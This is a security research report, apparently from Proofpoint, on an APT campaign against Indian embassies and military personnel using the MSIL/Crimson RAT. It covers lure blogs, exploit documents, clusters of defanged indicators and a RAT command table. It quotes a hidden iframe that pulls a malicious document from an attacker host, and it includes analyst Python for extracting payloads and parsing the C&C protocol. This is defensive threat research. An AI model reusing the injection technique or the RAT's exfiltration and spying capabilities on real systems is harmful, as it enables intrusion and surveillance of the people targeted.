Introduction

Proofpoint researchers recently uncovered evidence of an advanced persistent threat (APT) against Indian diplomatic
and military resources. Our investigation began with malicious emails sent to Indian embassies in Saudi Arabia and
Kazakhstan but turned up connections to watering hole sites focused on Indian military personnel and designed to drop a
remote access Trojan (RAT) with a variety of data exfiltration functions. Our analysis shows that many of the campaigns
and attacks appear related by common IOCs, vectors, payloads, and language, but the exact nature and attribution
associated with this APT remain under investigation.

At this time, the background and analysis in this paper provide useful forensics and detail our current thinking on the 
malware that we have dubbed “MSIL/Crimson”. 


Attack against Indian Embassies in Saudi Arabia and Kazakhstan 

On February 11, 2016, we discovered two attacks minutes apart directed towards officials at Indian embassies in both
Saudi Arabia and Kazakhstan. Both e-mails (Fig. 1, 2) were sent from the same originating IP address (5.189.145[.]248)
belonging to Contabo GmbH, a hosting provider that seems to be currently favored by these threat actors. The e-mails
also likely utilized Rackspace’s MailGun service, and both of them carried the same exact attachment.

Emails:

4a0728a48c393a480dc328c0e972d57c5493ee5619699e9c21ff7e800948c8e8, “def.astana” <def.astana@mea.gov.in>

839569f031a2cb6e9ae1dc797b1bd7cce53d3528c8b5fbec21cecb0de3f5ac88, “def.riyadh” <def.riyadh@mea.gov.in>

Attachment: 

3966f669a6af4278869b9cce0f2d9279, Harrasment (sic) Case Shakantula.doc 
exploit: CVE-2012-0158 

Doc dropped:

6a69cd7a2cb993994fccec7b7e99c5daa5ec8083ba887142cb0242031d7d4966, svchost.exe
functionality: downloader
Figure 1: First email sent to Embassy of India, Astana, Kazakhstan
Figure 2: Second email sent to Embassy of India, Riyadh, Kingdom of Saudi Arabia






In this incident, the attachment was a weaponized RTF document utilizing CVE-2012-0158 to drop an embedded,
encoded portable executable (PE). To decode the embedded PE, the document’s shellcode first searches for the
0xBABABABA marker that, when found, indicates the beginning position of the PE (Fig. 3). The PE is then decoded
using the key 0xCAFEBABE while skipping null DWORDs (Fig. 4). A final marker indicates the end of the PE file, which, in
this case, is the marker 0xBBBBBBBB. This decode routine, along with other components of the exploit document, has
been discussed before and has been observed in completely unrelated incidents.



Figure 3: Shellcode searching for 0xBABABABA marker
Figure 4: Decoding of encoded PE and searching for terminator marker
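The marker-and-key scheme described above, written out as an extraction routine an analyst can run over a suspect RTF to pull the embedded PE for analysis (an added example, not code from the report or from the exploit document). It assumes the decode is a DWORD-wise XOR with 0xCAFEBABE on little-endian DWORDs (the report names the key but not the operation) and that the end marker is only accepted on a DWORD boundary relative to the start of the encoded region; encode_for_test, sample_pe and looks_like_pe are constructed helpers for the demonstration.

```python
import struct
from typing import Tuple

START_MARKER = b"\xba\xba\xba\xba"   # 0xBABABABA: begins the encoded PE
END_MARKER = b"\xbb\xbb\xbb\xbb"     # 0xBBBBBBBB: terminates the encoded PE
KEY = 0xCAFEBABE                     # decode key named in the report


def find_encoded_region(blob: bytes) -> Tuple[int, int]:
    """Return (start, end) offsets of the encoded bytes lying between the markers.

    Assumption: the end marker must sit on a DWORD boundary relative to the
    region start, which avoids false hits on 0xBB runs straddling two DWORDs.
    """
    start = blob.find(START_MARKER)
    if start < 0:
        raise ValueError("0xBABABABA start marker not found")
    body = start + len(START_MARKER)
    end = blob.find(END_MARKER, body)
    while end >= 0 and (end - body) % 4 != 0:
        end = blob.find(END_MARKER, end + 1)
    if end < 0:
        raise ValueError("0xBBBBBBBB end marker not found")
    return body, end


def decode_embedded_pe(blob: bytes) -> bytes:
    """Decode the PE: XOR each DWORD with KEY, leaving null DWORDs untouched."""
    body, end = find_encoded_region(blob)
    encoded = blob[body:end]
    whole = len(encoded) - len(encoded) % 4
    out = bytearray()
    for off in range(0, whole, 4):
        (dword,) = struct.unpack_from("<I", encoded, off)
        if dword != 0:                # the shellcode skips null DWORDs
            dword ^= KEY
        out += struct.pack("<I", dword)
    out += encoded[whole:]            # a trailing partial DWORD passes through
    return bytes(out)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check on a decoded blob: MZ header and an in-range PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def encode_for_test(pe: bytes, prefix: bytes = b"{\\rtf1 junk ") -> bytes:
    """Constructed inverse of decode_embedded_pe, used only to build fixtures."""
    padded = pe + b"\x00" * (-len(pe) % 4)
    enc = bytearray()
    for off in range(0, len(padded), 4):
        (dword,) = struct.unpack_from("<I", padded, off)
        enc += struct.pack("<I", dword ^ KEY if dword else 0)
    return prefix + START_MARKER + bytes(enc) + END_MARKER + b"}"


def sample_pe() -> bytes:
    """Constructed minimal MZ/PE stub (not a real executable) for the demo."""
    stub = bytearray(b"MZ" + b"\x00" * 0x3E)   # 0x40-byte DOS header, e_lfanew at 0x3C
    struct.pack_into("<I", stub, 0x3C, 0x40)   # PE signature follows the DOS header
    stub += b"PE\x00\x00" + b"This program cannot be run in DOS mode."
    return bytes(stub)


if __name__ == "__main__":
    rtf = encode_for_test(sample_pe())
    pe = decode_embedded_pe(rtf)
    print("decoded %d bytes, valid PE header: %s" % (len(pe), looks_like_pe(pe)))
```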

After successful exploitation and decoding of the embedded payload, a family of malware we refer to as MSIL/Crimson
will be executed on the victim’s machine. The first stage in infection is a downloader whose purpose is
to download the more fully featured RAT component. The MSIL/Crimson downloader that was dropped (md5:
3a67ebcab5dc3563dc161fdc3c7fb161) will attempt to download the full RAT from 213.136.87[.]122:10001 (Fig. 5). A full
description and analysis of the MSIL/Crimson malware family is provided in the Technical Analysis section.

Figure 5: MSIL/Crimson downloading RAT


Fake blog with an Indian military emphasis leads to MSIL/Crimson and more 

While conducting research related to MSIL/Crimson, Proofpoint researchers discovered a malicious blogspot.com site 
(Fig. 6), intribune.blogspot[.]com, that appears to have been set up to lure Indian military officials into becoming infected
with MSIL/Crimson, njRAT, and possibly other malicious tools. This site is likely operated by the same actor(s) that carried 
out the previously discussed attacks on Indian embassy officials based on shared C&C infrastructure as discussed in the 
Cluster Analysis section. Most of the published stories contain some method of directing potential victims to a malicious 
payload, although a few of the stories did not contain any malicious code at time of analysis. In the following articles from 
this site, we see the threat actors conducting their malicious activities in multiple ways: 

1. Using hyperlinks via an image or text

2. Using the same hypertext link in the article text, on the story’s image, and in an iframe 

3. The final article in this section contains a link to an additional website that is likely operated by the same threat 
actor(s) and connected to other email campaigns 

Lure articles 

4 Sikh Army Officers being trialed in military court on alleged involvement with KLF

Link: hxxp://intribune.blogspot[.]com/2015/11/4-sikh-army-officers-being-trialed-in.html

Malicious Document Location: hxxp://bbmsync2727[.]com/news/4%20Sikh%20Army%20Officers%20being%20trialed.doc

Document: 0197ff119e1724a1ffbf33df14411001
Type: Exploit, CVE-2012-0158, Embedded Payload
Dropped: njRAT - 27ca136850214234bcdca765dfaed79f
C&C: 5.189.145[.]248:10032
[Figure 6 screenshot: India News Tribe article “4 Sikh Army Officers being trialed in military court on alleged involvement
with KLF” (New Delhi Desk), ending in a “Read More.” link]

Figure 6: Article lure leading to exploit document capable of installing njRAT on vulnerable machines


[Figure 7 screenshot: decoy document text discussing Operation Blue Star (June 1984) and Sikh political figures]

Figure 7: Decoy document dropped by “4 Sikh Army Officers being trialed.doc”

One notable difference between this article and the rest is that it contained an iframe pointing to the same document 
linked to via the “Read More” hyperlink. This iframe causes visitors to be prompted to download the document 
immediately upon visiting, as well as from the top level of the malicious website. 

<iframe height="1" src="hxxp://bbmsync2727[.]com/news/4%20Sikh%20Army%20Officers%20being%20trialed.doc" style="display:none;" width="1"></iframe>

Figure 8: Iframe linking to malicious document



Seventh pay commission recommends overall hike of 23.55% 

Link: hxxp://intribune.blogspot[.]com/2015/11/seventh-pay-commission-recommends.html

At time of analysis, this web page contained no malicious links; however, we discovered a document that was likely
either prepared for this page or was previously linked to by this page.

Malicious Document Location: hxxp://bbmsync2727[.]com/cu/seventh%20pay%20commission%20salary%20calculator.xls

Document: 0e93b58193fe8ff8b84d543b535f313c

Additional Document Location: hxxp://bbmsync2727[.]com/cu/awho_handot_2015.xls

VBS Location: hxxp://bbmsync2727[.]com/cu/su.exe

Payload (older): 07e44ffcffde46ad96eb9c018bed6193 (DarkComet)

C&C (older): 5.189.145[.]248:1453

Payload (newer): 708a1af68d532df35c34f7088b8e798f (Luminosity Link RAT)

C&C (newer): 5.189.145[.]248:6318

[Figure 9 screenshot: India News Tribe article “Seventh pay commission recommends overall hike of 23.55%” with a
“Read | Seventh Pay Commission Salary Calculator” link]

Figure 9: Article lure with no link but likely leading to DarkComet or other malware


Army Air Defence (sic), Engineers and Signal to get additional colonels posts 

Link: hxxp://intribune.blogspot[.]com/2015/11/army-air-defenceengineers-and-signal-to.html
Malicious Document Location: hxxp://birthdaywisheszone[.]com/pml/army-air-defenceengineers-and-signal.doc
Document: 68773f362d5ab4897d4ca217a9f53975
Type: Exploit, CVE-2012-0158, Embedded Payload

Dropped: dac4f8ba3190cfa1f813e79864a73fe1 (MSIL/Crimson Downloader)

C&C: 213.136.87[.]122:10001

Downloaded MSIL/Crimson RAT: f078b5aeaf73831361ecd96a069c9f50

[Figure 10 screenshot: India News Tribe article “Army Air Defence, Engineers and Signal to get additional colonels posts”,
ending in a “Read Full Court Order.” link]

Figure 10: Article lure ultimately leading to MSIL/Crimson RAT


[Figure 11 screenshot: decoy document reproducing a news report on the Supreme Court hearing about 141 additional
colonel posts and the 2009 “command and exit” policy]

Figure 11: Decoy document dropped by “army-air-defenceengineers-and-signal.doc”

SC Seeks Army response on batch parity in officers promotion 

Link: hxxp://intribune[.]blogspot[.]com/2015/09/sc-seeks-army-response-on-batch-parity.html
Malicious Document Location: hxxp://www[.]avadhnama[.]com/latest/batchparity-command-exit-policy.doc

Unfortunately, we have not been able to retrieve the document hosted at that location; however, another file was located
in the same directory:

Location: hxxp://avadhnama[.]com/latest/ssbs.exe

Hash: df6b3946d1064f37d1b99f7bfae51203 (MSIL/Crimson Downloader)

C&C: 213.136.87[.]122:10001

Downloaded MSIL/Crimson RAT: c2bc8bc9ff7a34f14403222e58963507


[Figure 12 screenshot: India News Tribe article “SC Seeks Army response on batch parity in officers promotion”, ending
in a “Read More.” link]

Figure 12: Article lure possibly leading to MSIL/Crimson RAT


Seniors Juniors and coursemates please take a serious note about it 

Location: hxxp://intribune[.]blogspot[.]com/2015/05/seniors-juniors-and-coursemates-please.html 
Potential Payload Location: hxxp://sms[.]totalworthy[.]com/intribune.zip 

Unfortunately we have been unsuccessful in retrieving intribune.zip and are unsure what, if any, payloads it may have 
contained. 


[Figure 13 screenshot: India News Tribe article “Seniors Juniors and coursemates please take a serious note about it”, a
warning post about a woman befriending defence personnel over social media]

Figure 13: Article lure leading to likely malicious payload in the past


AWHO- Defence (sic) and Para-Military Forces Personnel Plots Scheme 2016 

Link: hxxp://intribune[.]blogspot[.]com/2015/07/awho-defence-and-para-military-forces.html
Malicious Document Location: hxxp://bbmsync2727[.]com/upd/AWHO-Upcoming-Projects.doc
Document: 1f82e509371c1c29b40b865ba77d091a
Type: Exploit, CVE-2012-0158, Embedded Payload

Dropped: 643d6407cd9a4f1c6d2742f24aed34f5 (MSIL/Crimson Downloader)

C&C: 213.136.87[.]122:10001

Downloaded MSIL/Crimson RAT: 0e3e81f4d2054746f74442075f82a5c5




[Figure 14 screenshot: India News Tribe article “AWHO- Defence and Para-Military Forces Personnel Plots Scheme 2016”,
a fake Army Welfare Housing Organization press release stating that project details are attached in a password
protected sheet, followed by a “GET CALL DETAIL RECORDS ONLINE” link]

Figure 14: Article lure ultimately leading to MSIL/Crimson and another malicious website




The AWHO article contains a link to hxxp://cdrfox[.]xyz/ via the “GET CALL DETAIL RECORDS ONLINE” hyperlink. 
This website is likely operated by the same actor(s) and is capable of delivering a VBS-based malicious document to 
unsuspecting victims (Fig. 15). Again, there is an obvious India-targeted theme that suggests this malicious website 
is specifically targeted at that nation. After using the number submission form, victims are directed to another page 
containing the final link to download a malicious document (Fig. 16). 




[Figure 15 screenshot: cdrfox[.]xyz landing page with an “Enter your mobile number here” form, a “DOWNLOAD CALL
DETAIL RECORDS” button, and airtel and BSNL logos]

Figure 15: Landing page for cdrfox[.]xyz
[Figure 16 screenshot: results page reading “AWESOME!!! Successfully grabed aLL call records of Last 90 Days of Phone
Number” with a “Download File” link]

Figure 16: Download File lure containing document that ultimately leads to Crimson Downloader

Document Details 

Location: hxxp://fileshare[.]attachment[.]biz/?att=1455255900
Document: 18711f1db99f6a6f73f8ab64f563accc
Document Name: “Call Details Record.xls”

Type: VBS Macro

VBS Location: hxxp://afgcloud7[.]com/logs/ssc.mcom

Payload: 3cc848432e0ebe25e4f19effdd92d9c2 (MSIL/Crimson Downloader)

Downloaded MSIL/Crimson RAT: 463565ec38e4d790a89eb592435820e3

Additional payloads were found on the same server but in a different directory: 

hxxp://afgcloud7[.]com/com/psp.dlc-bk (hash: 62d254790834f30a79ee79305d9be837, also previously named psp.dlc)
hxxp://afgcloud7[.]com/com/psp.dlc (hash: dd0fc222852f5d12fda2fb66e61b22f6)
hxxp://afgcloud7[.]com/upld/updt.dll (hash: 0ad849121b4656a239e85379948e5f5d)

Both files in the “/com/” directory are malicious droppers that ultimately drop a decoy Excel spreadsheet and an
MSIL/Crimson downloader. The spreadsheet is themed towards the Armed Forces Officials Welfare Organization
(AFOWO) located in India, while the dropped downloader and downloaded RAT communicate with the same C&C
as many of the previously discussed samples. An Excel spreadsheet named “AFOWO Broucher 2016.xls” (hash:
98bdcd97cd536ff6bcb2d39d9a097319) was also found containing a malicious macro that attempts to download a
payload from hxxp://afgcloud7[.]com/com/psp.dlc. Additionally, the IP address 50.56.21[.]178 resolved from
email.books2day[.]com (used in the embassy attacks). This IP has also recently resolved to email.afowoblog[.]in. We would
not be surprised if an email address using @afowoblog.in was used to send the malicious “AFOWO Broucher 2016.xls”
spreadsheet. Additional research related to this domain is provided in the Cluster Analysis section.

62d254790834f30a79ee79305d9be837 / dd0fc222852f5d12fda2fb66e61b22f6:

Dropped Decoy Dropper: 29054da7a1f1fbd0cb3090ee42335e54
Decoy Document: 66cd38a03282b85fceec42394190f420

Payloads: 83a8ce707e625e977d54408ca747fa29 or 2c9cc5a8569ab7d06bb8f8d7cf7dc03a (both MSIL/Crimson Downloader)

C&C: 213.136.87[.]122:10001

Downloaded MSIL/Crimson RAT: 463565ec38e4d790a89eb592435820e3

0ad849121b4656a239e85379948e5f5d

The payload found in the “/upld/” directory (md5: 0ad849121b4656a239e85379948e5f5d) is the MSIL/Crimson SecApp
module capable of downloading the full MSIL/Crimson RAT and all subsequent modules. Additionally, this payload drops
a decoy document (Fig. 17) with the filename “Cv of IMA Chief.docx” (hash: 8e5610d88c7fe08ac13b1c9f8c2c44cc). The
decoy document contains information regarding a possible Brigadier General whose last and current position (according
to the decoy) is the Chief of International Military Affairs Department Ministry Defence (sic) of Afghanistan.
[Figure 17 screenshot: decoy CV listing contact details, the name of a Brigadier General (redacted), father's name, place
and date of birth, blood group, passport number and an address in Afghanistan]

Figure 17: Decoy document dropped by 0ad849121b4656a239e85379948e5f5d


Cluster Analysis 

In this section we will present our research surrounding the use of the MSIL/Crimson implant and campaigns that are 
part of Operation Transparent Tribe. Even though the tool may possibly be used by several threat actors, our research 
indicates that the hundreds of Crimson samples may be clustered into a much smaller set of activity as described below. 

Cluster 1 - Operation Transparent Tribe and More 

The first cluster is the largest, with activity from over one hundred samples dating as far back as 2012 (Fig. 18). For this
cluster, we started our analysis beginning with the email attacks on the Indian embassies and the fake Indian news blog.
The activity surrounding those two events uncovered numerous other samples hosted on attacker-controlled C&C that
then led to at least one additional email attack campaign. On one of the C&Cs we discovered a Python-based RAT
(Python/Peppy) whose activity very closely clusters to Operation Transparent Tribe. We have also observed this RAT
being downloaded and executed along with MSIL/Crimson by Andromeda downloaders. In addition to Crimson and
Peppy, we have observed the usage of Luminosity Link RAT, njRAT, Bezigate, Meterpreter, and several custom
downloaders.
[Figure 18 legend: Email Address, Unique Identifier, IPv4 Address, Domain, File]

Figure 18: Maltego graph of cluster 1 activity

The attackers responsible for this activity appear to have used a mixture of compromised infrastructure (e.g.,
sahirlodhi[.]com) and infrastructure owned solely by them (e.g., bbmsync2727[.]com). In many cases, the attackers used
common patterns in naming their domains:

• sync in domain name and file name

• Repeated use of bb in domain name or filename, mostly bbm

• Ending second level domain names in four digits

Additionally, this cluster of activity has numerous instances where Contabo GmbH was used for C&C. However, we never
used that as the sole item to group activity together under this cluster. Next, we will discuss an additional email attack, the
attachment.biz activity, and lastly the afowoblog.in domain, all of which we believe fall into this cluster.


Email campaign using “2016 Pathankot attack” Lure 

While researching this activity, we discovered an additional email attack campaign using the 2016 Pathankot attack as a
lure (Fig. 19). This attack utilized a URL (hxxp://comdtoscc.attachment[.]biz/?att=1451926252) to deliver a compressed
file (md5: f689471d59e779657bc44da308246ac4) containing two MSIL/Crimson payloads using 193.37.152[.]28:9990 as
their C&C.

[Figure 19 screenshot: email from a Gmail address in the name of “Maj Gen Arvind Dutta”, claiming that details, terrorist
call records and satellite tracking records of the Pathankot Air Force base attack are attached, with the attachment
“Call Record and Tracking Route.mp3” downloading from hxxp://comdtoscc.attachment[.]biz/?att=1451926252]

Figure 19: email campaign using “2016 Pathankot attack” as a lure

The attackers further increased the believability of their attack by including decoy files with each of the MSIL/Crimson 
payloads: 

Sample 1: 65f6143d69cb1246a117a704e9f07fdc
Original name: “Call Record and Tracking Route.scr”

Dropped decoy: 2f821d8c404952495caae99974601e96, audio file with image (Fig. 20)

Decoy name: “Call Record and Tracking Route.mp3”
[Figure 20 screenshot: VLC media player playing “Call Record and Tracking Route.mp3”]

Figure 20: Audio file decoy, likely discussing Pathankot attack

Sample 2: 723d85f905588f092edf8691c1095fdb
Original name: “detail behind the scenes.scr”

Dropped decoy: a523b090e9a7e3868d8d1fde3e1ec57d, PDF (Fig. 21)
Decoy name: “detail behind the scenes.pdf”

Figure 21: Pathankot attack decoy



ATTACHMENT.BIZ domain 


We discovered additional activity surrounding the attachment.biz domain, which is being used to deliver malicious
documents and payloads. The observed domains include:

• fileshare.attachment[.]biz

• comdtoscc.attachment[.]biz

• ceengrmes.attachment[.]biz

• email.attachment[.]biz (no links discovered)

All of the domains resolve to the same IP, 91.194.91[.]203 (Contabo GmbH). So far we have detected three separate
campaigns; although we’re unsure of the starting point for each of these incidents, we are highly confident they exist in
this cluster of activity.

Link 1: hxxp://ceengrmes.attachment[.]biz/?att=1450603943
Payload: 07defabf004c891ae836de91260e6c82, MSIL/Crimson
Payload name: Accn Letter.scr
C&C: 5.189.143[.]225:11114

Link 2: hxxp://fileshare.attachment[.]biz/?att=1455264091
Payload: 18711f1db99f6a6f73f8ab64f563accc, XLS VBS-downloader *

Payload name: Air India Valid Destinations.xls

*Same payload as delivered by hxxp://fileshare[.]attachment[.]biz/?att=1455255900 from the attacker’s cdrfox.xyz site

Link 3: hxxp://comdtoscc.attachment[.]biz/?att=1453788170
Payload: 45d3130a901b7a763bf8f24a908b1810, compressed archive
Payload name: Message.zip

Decompressed Payload: 765f0556ed4db467291d48e7d3c24b3b, MSIL/Crimson
Decompressed payload name: Message.scr
C&C: 193.37.152[.]28:9990


AFOWOBLOG.IN Domain 

We have uncovered circumstantial evidence indicating that the afowoblog.in domain falls into this cluster of activity.
The domain was registered on or near February 24th, 2016 using the email address thefriendsmedia@gmail.com,
which is also close to the same day that the “AFOWO Broucher 2016.xls” attachment was uploaded to VT. We have
detected potentially connected activity as far back as June 2013 using the domain thefriendsmedia[.]com, where it
was used as an Andromeda C&C.

In one instance (Fig. 22, maltego graph), we observed an Andromeda payload communicate with 
brooksidebiblefellowship[.]org to retrieve an additional Andromeda payload from lolxone[.]com that then used 
thefriendsmedia[.]com as its C&C. The original Andromeda also retrieved a Bezigate payload. 
[Figure 22 graph nodes: 5075b1c4345c6fd325d0f3f7605f40c7, 236e7451cbce959ca0f62fb3b499b54e, thefriendsmedia.com,
62.4.23.46:1500]

Figure 22: thefriendsmedia connection to Andromeda, lolxone[.]com, and Bezigate

Furthermore, we have observed lolxone[.]com hosting additional Bezigate payloads as well as the Python/Peppy 
malware as shown in the graph below (Fig. 23). This activity can be further connected to the overall cluster via the Peppy, 
Bezigate, and Andromeda C&Cs as shown in the complete Maltego graph (Fig. 25). 
Figure 23: lolxone[.]com and Andromeda connections to Python/Peppy, Bezigate

Cluster 2 - guddyapps/appstertech/sajid 

Some Crimson SecApp modules we came across did not download the expected RAT or downloader payload when they
first communicated with their C&C. For example, sample 85429d5f2745d813e53b28d3d953d1cd retrieved a downloader
from 178.238.228[.]113:7861. Once the downloader was executed, it then downloaded an XMPP library (md5:
fee34da6f30a17e1fcc5a49fd0987169) and the XMPP-based Trojan (md5: d3094c89cad5f8d1ea5f0a7f23f0a2b1) we
refer to as Beendoor. Beendoor is a very interesting piece of malware, and we were able to gather additional
information about this variant's C&C, 178.238.235[.]143.

Much like Crimson and Peppy, Beendoor is capable of taking screenshots of the victim’s desktop. On Beendoor’s C&C
we were able to recover a screenshot that appears to have been taken from one of the malware developers’ computers
(Fig. 24). In this modified screenshot we are bringing attention to a few key pieces of information:

• Identical “Anushka” image on desktop found on Beendoor C&C and used in Beendoor sample 

• Folder structure similar to that found on the C&C 

• Hardcoded paths found in Beendoor dropper binary (md5: 9b98abb9a9fa714e05d43b08b76c0afa) 

• Same file names used by Beendoor and the XMPP library 
[Figure 24 screenshot annotations: hi-res “anushka.jpg” found on C&C; folders appstertech.com and guddyapps.com;
Beendoor Downloader 950eb314435bdb3c46c9f0954c935287; wmplayer.exe d3094c89cad5f8d1ea5f0a7f23f0a2b1;
agsxmpp.dll fee34da6f30a17e1fcc5a49fd0987169]

Figure 24: Screenshot of likely Beendoor developer’s desktop

As shown in the figure, it seems likely that the Pakistan-based company Appstertech is somehow connected to the 
Beendoor malware. Based on the analysis of the folders and files on the Beendoor C&C, we can also conclude that this 
activity is related to research published by CloudSek late last year. 

In the Crimson samples that we found connected to Beendoor (Fig. 25), several of them used the same “Binder” dropper
that we observed in other clusters, including Cluster 1. Moreover, the C&Cs for this occurrence of Crimson and Beendoor
are both hosted at Contabo GmbH, another similarity with other clusters surrounding the Crimson implant.


Figure 25: Maltego graph of Crimson <-> Beendoor cluster


Cluster 3 - “Nadra attack in Mardan” Lure 

In addition to the attack using the recent Pathankot attack as a lure, we discovered several samples that may have
been used in recent attack campaigns utilizing the December attack in Mardan near a National Database and
Registration Authority (Nadra) as a lure. Several samples were uploaded to VT in compressed archives containing
Crimson payloads along with possible decoys their respective droppers would have dropped. For example,
one of the payloads (md5: 51c57b0366d0b71acf05b4df0afef52f, “NADRA OFC.exe”) was uploaded to VT along
with an image (md5: be0b258e6a419b926fe1cfc04f7e575a) that can also be found here:
hxxp://i.dawn[.]com/medium/2015/12/56825d6d8f1a5.png, which is linked to by an article about the attack:
hxxp://www.dawn[.]com/news/1229406

For this cluster of activity, we’re not currently aware of any droppers and so have decided to cluster it on its own. With
that in mind, however, the TTPs for this campaign are nearly identical to the “Pathankot attack lure” campaign in Cluster
1. Unsurprisingly, the C&C utilized in this campaign is hosted at Contabo GmbH. Lastly, the port used in these samples,
11100, is the same port used by some of the samples we have grouped in Cluster 1.


Threat Insight | Operation Transparent Tribe 
Cluster 4 - DDNS and Pakistan

The final cluster we would like to discuss includes several samples, all using DDNS for their C&C, pointing to Pakistani IP
addresses (according to Whois). The majority of this activity is from 2013. Based on the slightly different TTPs (purely
DDNS usage) and no use of Contabo GmbH, we have clustered this separately from other activity, even though we
have observed DDNS usage in Cluster 1 and there is obvious overlap in tool usage. This activity is graphed in Figure 26
and included in the IOCs section.



[Figure 26 graph nodes: 119.154.209.175, 119.154.134.211, 119.154.220.96, 182.181.239.4, 119.157.229.245,
119.157.163.145]

Figure 26: DDNS and Pakistan IP address Maltego graph


One Cluster to Rule Them All, Nothing Yet to Bind Them... 

There are numerous overlaps between the clusters, including usage of the “Binder” dropper, attack lures, and, most
obviously, the usage of Contabo GmbH. Unfortunately, we lack information regarding some of the found samples as far as
how they were used and in what campaigns, and so we have decided not to tie all the activity together. As we continue to
research these incidents, we would not be surprised to find additional information linking all clusters together.


Technical Analysis 

MSIL/Crimson 

Crimson is modular in the sense that additional payloads downloaded by the main RAT module are often utilized to 
perform functions such as keylogging and browser credential theft. Crimson infections also typically occur in stages. 
Crimson’s first stage is a downloader component whose primary purpose is to download a more fully featured RAT, 
typically being the Crimson RAT component. The RAT component will then send system information to the C&C while the 
C&C will likely respond with additional module payloads. 

Crimson utilizes a custom TCP protocol for communicating to C&C (Fig. 27). Some of Crimson’s optionally downloaded 
modules have no C&C capability and instead rely on the RAT component for information exfiltration. 


09 00 00 00 00 64 69 72 73 3d 6c 69 73 74                 .....dirs=list
13 00 00 00 00 42 4f 52 41 4b 48 37 38 36 2d 64           .....BORAKH786-d
69 72 73 3d 43 3a 5c 3e                                   irs=C:\>

Figure 27: Crimson custom TCP C&C protocol
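As an added example (not code from the report or from the Crimson authors), the following Python parser splits a raw Crimson C&C byte stream such as the one in Figure 27 into its messages. The two frames in the figure are consistent with a small little-endian length value occupying the five bytes before each ASCII string (0x09 before the 9-byte "dirs=list", 0x13 before the 19-byte "BORAKH786-dirs=C:\>"); that five-byte prefix width is an assumption read from the figure, so it is a parameter. Splitting the reply into a victim identifier, command and argument is likewise our reading of the figure, not something the report states.

```python
"""Frame parser for the MSIL/Crimson custom TCP C&C protocol (Figure 27).

Added example, not code from the report. Assumption: every message is a
little-endian length field of PREFIX_LEN bytes followed by that many ASCII
bytes; the two frames visible in Figure 27 fit that layout.
"""
from typing import List, Optional, Tuple

# Bytes transcribed from the capture in Figure 27: a "dirs=list" request and
# the "BORAKH786-dirs=C:\>" reply.
FIGURE_27_STREAM = bytes.fromhex(
    "09 00 00 00 00 64 69 72 73 3d 6c 69 73 74 "
    "13 00 00 00 00 42 4f 52 41 4b 48 37 38 36 2d 64 "
    "69 72 73 3d 43 3a 5c 3e"
)

PREFIX_LEN = 5  # assumed width of the length field (see module docstring)


def parse_frames(stream: bytes, prefix_len: int = PREFIX_LEN) -> List[str]:
    """Split a reassembled TCP stream into its length-prefixed ASCII messages.

    Raises ValueError on a truncated prefix or body so that a partial capture
    is reported rather than silently mis-parsed.
    """
    frames: List[str] = []
    pos = 0
    while pos < len(stream):
        if len(stream) - pos < prefix_len:
            raise ValueError(f"truncated length prefix at offset {pos}")
        length = int.from_bytes(stream[pos:pos + prefix_len], "little")
        pos += prefix_len
        body = stream[pos:pos + length]
        if len(body) != length:
            raise ValueError(
                f"truncated frame at offset {pos}: declared {length}, have {len(body)}"
            )
        frames.append(body.decode("ascii"))
        pos += length
    return frames


def decode_message(msg: str) -> Tuple[Optional[str], str, str]:
    """Split a message into (victim_id, command, argument).

    Requests from the controller look like "cmd=arg"; the reply in Figure 27
    prefixes the command with a victim identifier, "VICTIMID-cmd=arg".
    """
    key, _, arg = msg.partition("=")
    victim, sep, cmd = key.rpartition("-")
    if not sep:
        return None, key, arg
    return victim, cmd, arg


def summarize(stream: bytes) -> List[dict]:
    """Decode every frame and label its probable direction, for triage notes."""
    rows = []
    for frame in parse_frames(stream):
        victim, cmd, arg = decode_message(frame)
        rows.append({
            "direction": "implant->c2" if victim else "c2->implant",
            "victim": victim,
            "command": cmd,
            "argument": arg,
        })
    return rows


if __name__ == "__main__":
    for row in summarize(FIGURE_27_STREAM):
        print(row)
```

Run against a reassembled TCP stream (for example the output of Wireshark's "Follow TCP Stream" saved as raw bytes), the parser yields the command names that Table 1 describes, which makes it straightforward to turn a capture into a timeline of what the controller asked for and what the implant returned.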
Crimson-infected victims may be spied on by their attackers via invasive methods such as webcam capture, theft of email from Outlook, and screen recording. Some Crimson RAT variants support at least 40 individual commands; all the commands we observed across the different versions of the RAT we researched are listed and described in Table 1.

Table 1. MSIL/Crimson supported commands

Command            Description
afile              Exfiltrate file to C&C
audio              Download legitimate NAudio library from C&C, save as NAudio.dll (not executed or added to startup). Used to record audio from microphone.
autf               Add extensions to file extensions list. Optionally search for files in extensions list and exfiltrate
autoa              Exfiltrate all files with an extension matching the file extensions list
capcam             Capture still from webcam
camvdo             Continuous capture from webcam (stopped with stops command)
clping             Set runTime to DateTime.Now
clrklg             Stop keylogger and delete keylogs
cnls               Stop upload, download, and screen capture
cscreen            Single screenshot
delt               Delete provided path/file
dirs               Send disk drives
dotnet             Download URLDownload payload, save as dotnetframwork.exe and add to startup via registry
dowf               Retrieve file from C&C
dowr               Retrieve file from C&C and execute
email              Capable of retrieving email account name, number of emails, and exfiltrating emails from Outlook
endpo              Kill process given PID
fbind              Save file from C&C in existing directory with .exe appended to name
file               Exfiltrate file to C&C
filsz              Send file info: CreateTimeUtc, File Size
fldr               List folders in a directory
fles               List files in a directory
ftyp               Add extensions to file extensions list
info               Send PC info (MAC, PC Name, User, LAN IP, OS, AV, missing modules...)
klgs               Sometimes not implemented but command exists (previous versions: enable automatic exfiltration of keylogs)
listf              Search for files with given extension(s)
mesg               Pop-up “Alert” box with provided message
msdlf              Click mouse
muspo              Move mouse cursor
obind              Save file from C&C to directory with .exe appended to name
outdwn             Search for specific email attachment with specified name and exfiltrate
passl              Retrieve password logger logs
prod               List processes
runf               Execute command
rupth              Retrieve malware’s run path
savaf              Save file from C&C
scren              Capture screen continuously
scrsz              Set scrSize (utilized by scren and cscreen)
secup              Download “secApp” payload from C&C, add to startup via registry
sndpl              Download “pssApp” from C&C (browser credential stealer) and begin log exfiltration
sndps              Download “pssApp” from C&C (browser credential stealer)
splitr             Split file into provided number of splits; however, we believe that due to programmer error this functionality will not work as expected
stops              Stop screen capture
stsre              Get microphone audio
sysky              Exfiltrate keylogs to C&C
systsk             Update module, likely secApp
thumb              Get 200x150 GIF thumbnail of image
